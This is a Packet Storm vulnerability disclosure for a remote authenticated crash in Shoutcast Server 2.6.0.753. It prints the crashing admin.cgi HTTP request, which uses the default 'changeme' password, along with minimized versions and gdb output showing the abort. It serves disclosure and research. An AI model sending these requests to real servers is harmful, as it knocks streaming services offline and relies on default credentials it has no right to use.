exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Shoutcast Server 2.6.0.753 Crash

Shoutcast Server 2.6.0.753 Crash
Posted Aug 23, 2021
Authored by Jeremy Brown

Shoutcast server version 2.6.0.753 suffers from a remote authenticated crash vulnerability.

tags | exploit, remote
SHA-256 | 991ebf15a2fad6e84c2cb8c0596024371c0ae5aa7b0309a15458c5be942d417d

Shoutcast Server 2.6.0.753 Crash

Change Mirror Download
Shoutcast Server Remote Authenticated Crash

=====
Intro
=====

Shoutcast Server crashes after failing to handle a non-existent option recieved from a client in an ADMINCGI request. Requires auth to reproduce, so not super exciting but Shoutcast is an old favorite and the minimization of the repro is the most interesting part of this write-up.

It appears that Shoutcast hasn't had a public crash or code exec bug since 2004, and that one was way cooler...

-> https://marc.info/?l=bugtraq&m=110886444014745

============
Package Info
============

Tested: Shoutcast Server v2.6.0.753/posix(linux x64)

Package: https://download.nullsoft.com/shoutcast/tools/sc_serv2_linux_x64-latest.tar.gz

=====
Repro
=====

----------------
Crashing Request
----------------

GET /admin.cgi?pass=changeme&mode=debug&option=donotcrash HTTP/1.1 // what's pass= doing here by default?
Host: localhost:8000
Connection: keep-alive
Authorization: Basic YWRtaW46Y2hhbmdlbWU=
Referer: https://localhost:8000/admin.cgi?mode=debug

---------
Minimized
---------

GET /admin.cgi?mode=debug&option=a
Authorization:s YWRtaW46Y2hhbmdlbWU
Referer:admin.cgi

-----------
Minimized++
-----------

Taking a look at the minimized version, one can make some guesses about what the target is looking for and even the root cause of the crash.

1) The request is most important part
2) option= can probably be a lot of different things
3) The Host and Connection headers aren't neccesary
4) Authorization header parsing is just looking for the second token and doesn't care if it's explicitly presenting Basic auth
5) Referer is necessary, but only admin.cgi and not the host or URL

Bonus: passing a valid password isn't needed if the Authorization creds are correct, and visa-versa. Since the minimization is linear and starts at the beginning of the file and goes until it hits the end, we'd only produce a repro which authenticates this way, while still discovering there are actually two options. This leaves us with the "maximum" minimized crashing request.

-----------
Final repro
-----------

GET /admin.cgi?pass=changeme&mode=debug&option=a
Referer:admin.cgi

========
Debugger
========

> gdb sc_serv
(gdb) r shoutcast.conf
...
terminate called after throwing an instance of 'std::runtime_error'
2021-06-30 08:46:42 INFO [ADMINCGI] Disabling the `donotcrash' debugging options // :D
what(): Unknown option donotcrash

Thread 5 "sc_serv" received signal SIGABRT, Aborted.

===
Fix
===

No response from security team at Shoutcast
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close